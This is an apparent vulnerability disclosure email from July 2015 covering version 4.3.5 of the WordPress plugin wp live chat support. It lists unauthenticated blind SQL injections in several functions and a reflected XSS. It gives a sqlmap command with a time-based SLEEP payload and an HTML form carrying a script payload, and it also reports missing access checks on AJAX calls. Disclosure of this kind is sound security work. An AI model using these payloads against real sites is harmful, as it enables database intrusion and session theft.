Subject: Blind SQL injections, XSS and more in wp live chat support 4.3.5
Date: Mon, 6 Jul 2015 14:12:38 +0200

Hello,

Plugin: wp live chat support 4.3.5 

Unauthenticated remote attackers can execute arbitrary SQL commands


1. SQL injection (wplc_update_user_on_page())

Method: POST
Url: http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php
Vulnerable parameters: cid, status

Example PHP callstack:

wplc_update_user_on_page   [/wp-live-chat-support/functions.php:74]
  wpdb::query

Sqlmap verification:

sqlmap --method POST --data "action=wplc_call_to_server_visitor&cid=-1" --dbms mysql -p cid -u http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php

...
Parameter: cid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: action=wplc_call_to_server_visitor&cid=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))XGba) AND 'uomP'='uomP
...


2. XSS 

Method: POST
Url: http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php
Vulnerable parameter: wplc_update_admin_chat_table

(json with content type text/html)

Example:

<form action="http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php" method="POST">
<input type="text" name="action" value="wplc_admin_long_poll">
<input type="text" name="wplc_update_admin_chat_table" value="<img src=x onerror='javascript:alert(1);'>">
<input type="submit">
</form>


3. Other SQL injections found in:

wplc_return_chat_status(), 
wplc_return_admin_chat_messages()
wplc_change_chat_status()
wplc_return_chat_session_variable()
wplc_return_user_chat_messages()
wplc_mark_as_read_user_chat_messages()
wplc_return_chat_name()
wplc_return_chat_email()
wplc_user_initiate_chat()


Please also note that there aren't any user level checks for ajax calls (like for wplc_return_admin_chat_messages, wplc_admin_send_msg etc.).


--
Regards,
Marcin Probola,
https://wordpress.org/plugins/wp-live-chat-support/